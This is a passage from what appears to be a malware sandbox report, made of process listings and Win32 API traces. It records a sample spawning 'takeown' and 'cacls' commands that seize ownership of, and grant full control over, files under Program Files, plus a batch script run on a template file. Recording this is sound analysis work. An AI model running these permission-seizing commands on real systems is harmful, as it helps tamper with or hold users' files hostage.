lpOverlapped=0x0) returned 1 [0232.949] GetLastError () returned 0x0 [0232.949] _get_osfhandle (_FileHandle=3) returned 0x74 [0232.949] GetFileType (hFile=0x74) returned 0x1 [0232.949] _get_osfhandle (_FileHandle=3) returned 0x74 [0232.949] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0232.949] GetProcessHeap () returned 0x3a0000 [0232.950] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x400a) returned 0x3c43a8 [0232.950] GetProcessHeap () returned 0x3a0000 [0232.950] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c43a8 | out: hHeap=0x3a0000) returned 1 [0232.951] _get_osfhandle (_FileHandle=3) returned 0x74 [0232.951] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0232.951] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x31f4bc, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x31f4bc*=0x0, lpOverlapped=0x0) returned 1 [0232.951] GetLastError () returned 0x0 [0232.952] _get_osfhandle (_FileHandle=3) returned 0x74 [0232.952] GetFileType (hFile=0x74) returned 0x1 [0232.952] _get_osfhandle (_FileHandle=3) returned 0x74 [0232.952] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0232.952] GetProcessHeap () returned 0x3a0000 [0232.952] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x400a) returned 0x3c43a8 [0232.952] GetProcessHeap () returned 0x3a0000 [0232.952] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c43a8 | out: hHeap=0x3a0000) returned 1 [0232.952] longjmp () [0232.952] _tell (_FileHandle=3) returned 226 [0232.952] _close (_FileHandle=3) returned 0 [0232.952] CmdBatNotification () returned 0x1 [0232.952] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.952] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.953] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0232.953] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.953] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0232.954] SetConsoleInputExeNameW () returned 0x1 [0232.954] GetConsoleOutputCP () returned 0x1b5 [0232.954] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0232.954] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.954] exit (_Code=1) Process: id = "146" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x35094000" os_pid = "0x6b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "140" os_parent_pid = "0x24c" cmd_line = "cacls \"C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 645 os_tid = 0x130 Process: id = "147" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x350e7000" os_pid = "0x548" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 646 os_tid = 0x6cc Thread: id = 650 os_tid = 0x90c Thread: id = 654 os_tid = 0x748 Process: id = "148" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x33931000" os_pid = "0x98c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k secsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\WinDefend" [0xe], "NT AUTHORITY\\Logon Session 00000000:000664c8" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 649 os_tid = 0xb3c Thread: id = 651 os_tid = 0x9cc Thread: id = 652 os_tid = 0xa3c Thread: id = 663 os_tid = 0x9bc Thread: id = 720 os_tid = 0x7f0 Thread: id = 722 os_tid = 0xae8 Thread: id = 750 os_tid = 0x5cc Thread: id = 767 os_tid = 0x80c Thread: id = 768 os_tid = 0x500 Thread: id = 769 os_tid = 0xa1c Thread: id = 770 os_tid = 0x6c8 Thread: id = 774 os_tid = 0x9bc Thread: id = 785 os_tid = 0xa40 Process: id = "149" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x34197000" os_pid = "0xb18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "132" os_parent_pid = "0x7b0" cmd_line = "takeown /F \"C:\\Program Files\\MSBuild\\executed_florists.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 653 os_tid = 0x5b8 Process: id = "150" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x363ca000" os_pid = "0x598" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 655 os_tid = 0x30c [0168.276] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x37f984 | out: lpSystemTimeAsFileTime=0x37f984*(dwLowDateTime=0x1e3e9cc0, dwHighDateTime=0x1d68287)) [0168.276] GetCurrentProcessId () returned 0x598 [0168.277] GetCurrentThreadId () returned 0x30c [0168.277] GetTickCount () returned 0x1157002 [0168.277] QueryPerformanceCounter (in: lpPerformanceCount=0x37f97c | out: lpPerformanceCount=0x37f97c*=28861567916) returned 1 [0168.279] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0168.279] __set_app_type (_Type=0x1) [0168.279] __p__fmode () returned 0x770331f4 [0168.279] __p__commode () returned 0x770331fc [0168.280] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0168.280] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0168.280] GetCurrentThreadId () returned 0x30c [0168.280] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x30c) returned 0x60 [0168.281] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0168.281] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0168.281] SetThreadUILanguage (LangId=0x0) returned 0x409 [0169.151] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0169.151] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x37f914 | out: phkResult=0x37f914*=0x0) returned 0x2 [0169.187] VirtualQuery (in: lpAddress=0x37f94b, lpBuffer=0x37f8e4, dwLength=0x1c | out: lpBuffer=0x37f8e4*(BaseAddress=0x37f000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.187] VirtualQuery (in: lpAddress=0x280000, lpBuffer=0x37f8e4, dwLength=0x1c | out: lpBuffer=0x37f8e4*(BaseAddress=0x280000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0169.187] VirtualQuery (in: lpAddress=0x281000, lpBuffer=0x37f8e4, dwLength=0x1c | out: lpBuffer=0x37f8e4*(BaseAddress=0x281000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0169.187] VirtualQuery (in: lpAddress=0x283000, lpBuffer=0x37f8e4, dwLength=0x1c | out: lpBuffer=0x37f8e4*(BaseAddress=0x283000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.187] VirtualQuery (in: lpAddress=0x380000, lpBuffer=0x37f8e4, dwLength=0x1c | out: lpBuffer=0x37f8e4*(BaseAddress=0x380000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x110000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0169.187] GetConsoleOutputCP () returned 0x1b5 [0170.393] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0170.393] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0170.393] _get_osfhandle (_FileHandle=1) returned 0x7 [0170.393] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0170.394] _get_osfhandle (_FileHandle=1) returned 0x7 [0170.394] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0170.394] _get_osfhandle (_FileHandle=1) returned 0x7 [0170.394] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0170.395] _get_osfhandle (_FileHandle=0) returned 0x3 [0170.395] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0170.395] _get_osfhandle (_FileHandle=0) returned 0x3 [0170.395] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0170.396] GetEnvironmentStringsW () returned 0x4a4068* [0170.396] GetProcessHeap () returned 0x490000 [0170.396] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xaca) returned 0x4a4b40 [0170.397] FreeEnvironmentStringsW (penv=0x4a4068) returned 1 [0170.397] GetProcessHeap () returned 0x490000 [0170.397] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4) returned 0x4a0d20 [0170.397] GetEnvironmentStringsW () returned 0x4a4068* [0170.397] GetProcessHeap () returned 0x490000 [0170.397] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xaca) returned 0x4a5618 [0170.398] FreeEnvironmentStringsW (penv=0x4a4068) returned 1 [0170.398] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37e884 | out: phkResult=0x37e884*=0x68) returned 0x0 [0170.398] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x0, lpData=0x37e890*=0x0, lpcbData=0x37e888*=0x1000) returned 0x2 [0170.398] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x4, lpData=0x37e890*=0x1, lpcbData=0x37e888*=0x4) returned 0x0 [0170.398] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x0, lpData=0x37e890*=0x1, lpcbData=0x37e888*=0x1000) returned 0x2 [0170.398] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x4, lpData=0x37e890*=0x0, lpcbData=0x37e888*=0x4) returned 0x0 [0170.399] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x4, lpData=0x37e890*=0x40, lpcbData=0x37e888*=0x4) returned 0x0 [0170.399] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x4, lpData=0x37e890*=0x40, lpcbData=0x37e888*=0x4) returned 0x0 [0170.399] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x0, lpData=0x37e890*=0x40, lpcbData=0x37e888*=0x1000) returned 0x2 [0170.399] RegCloseKey (hKey=0x68) returned 0x0 [0170.399] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37e884 | out: phkResult=0x37e884*=0x68) returned 0x0 [0170.399] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x0, lpData=0x37e890*=0x40, lpcbData=0x37e888*=0x1000) returned 0x2 [0170.399] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x4, lpData=0x37e890*=0x1, lpcbData=0x37e888*=0x4) returned 0x0 [0170.399] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x0, lpData=0x37e890*=0x1, lpcbData=0x37e888*=0x1000) returned 0x2 [0170.399] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x4, lpData=0x37e890*=0x0, lpcbData=0x37e888*=0x4) returned 0x0 [0170.399] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x4, lpData=0x37e890*=0x9, lpcbData=0x37e888*=0x4) returned 0x0 [0170.399] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x4, lpData=0x37e890*=0x9, lpcbData=0x37e888*=0x4) returned 0x0 [0170.400] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37e88c, lpData=0x37e890, lpcbData=0x37e888*=0x1000 | out: lpType=0x37e88c*=0x0, lpData=0x37e890*=0x9, lpcbData=0x37e888*=0x1000) returned 0x2 [0170.400] RegCloseKey (hKey=0x68) returned 0x0 [0170.400] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2c7 [0170.400] srand (_Seed=0x5f51e2c7) [0170.400] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"\"" [0170.400] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"\"" [0170.401] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0170.401] GetProcessHeap () returned 0x490000 [0170.401] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x210) returned 0x4a4068 [0170.401] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a4070, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0170.402] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0170.402] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0170.402] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0170.402] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0170.402] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0170.402] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0170.402] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0170.402] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0170.402] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0170.403] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0170.403] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0170.403] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0170.403] GetProcessHeap () returned 0x490000 [0170.403] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4b40 | out: hHeap=0x490000) returned 1 [0170.403] GetEnvironmentStringsW () returned 0x4a4280* [0170.403] GetProcessHeap () returned 0x490000 [0170.403] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xae2) returned 0x4a6be0 [0170.403] FreeEnvironmentStringsW (penv=0x4a4280) returned 1 [0170.403] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0170.404] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0170.404] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0170.404] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0170.404] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0170.404] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0170.404] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0170.404] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0170.404] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0170.404] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0170.404] GetProcessHeap () returned 0x490000 [0170.404] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x54) returned 0x4a76d0 [0170.404] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x37f650 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0170.405] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x37f650, lpFilePart=0x37f64c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37f64c*="Desktop") returned 0x25 [0170.405] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0170.405] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x37f3cc | out: lpFindFileData=0x37f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4a3ee8 [0170.405] FindClose (in: hFindFile=0x4a3ee8 | out: hFindFile=0x4a3ee8) returned 1 [0170.405] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x37f3cc | out: lpFindFileData=0x37f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4a3ee8 [0170.406] FindClose (in: hFindFile=0x4a3ee8 | out: hFindFile=0x4a3ee8) returned 1 [0170.406] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0170.406] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x37f3cc | out: lpFindFileData=0x37f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4a3ee8 [0170.406] FindClose (in: hFindFile=0x4a3ee8 | out: hFindFile=0x4a3ee8) returned 1 [0170.406] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0170.406] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0170.406] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0170.407] GetProcessHeap () returned 0x490000 [0170.407] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6be0 | out: hHeap=0x490000) returned 1 [0170.407] GetEnvironmentStringsW () returned 0x4a60f0* [0170.407] GetProcessHeap () returned 0x490000 [0170.407] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb36) returned 0x4a7f30 [0170.407] FreeEnvironmentStringsW (penv=0x4a60f0) returned 1 [0170.408] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0170.408] GetProcessHeap () returned 0x490000 [0170.408] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a76d0 | out: hHeap=0x490000) returned 1 [0170.408] GetProcessHeap () returned 0x490000 [0170.408] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400e) returned 0x4a8a70 [0170.409] GetProcessHeap () returned 0x490000 [0170.409] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe8) returned 0x4a4dc0 [0170.409] GetProcessHeap () returned 0x490000 [0170.409] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x4aca88 [0170.409] GetProcessHeap () returned 0x490000 [0170.409] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x4b0a98 [0170.410] GetProcessHeap () returned 0x490000 [0170.410] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a8a70 | out: hHeap=0x490000) returned 1 [0170.410] GetConsoleOutputCP () returned 0x1b5 [0170.411] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0170.411] GetUserDefaultLCID () returned 0x409 [0170.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0170.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x37f790, cchData=128 | out: lpLCData="0") returned 2 [0170.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x37f790, cchData=128 | out: lpLCData="0") returned 2 [0170.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x37f790, cchData=128 | out: lpLCData="1") returned 2 [0170.412] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0170.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0170.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0170.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0170.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0170.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0170.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 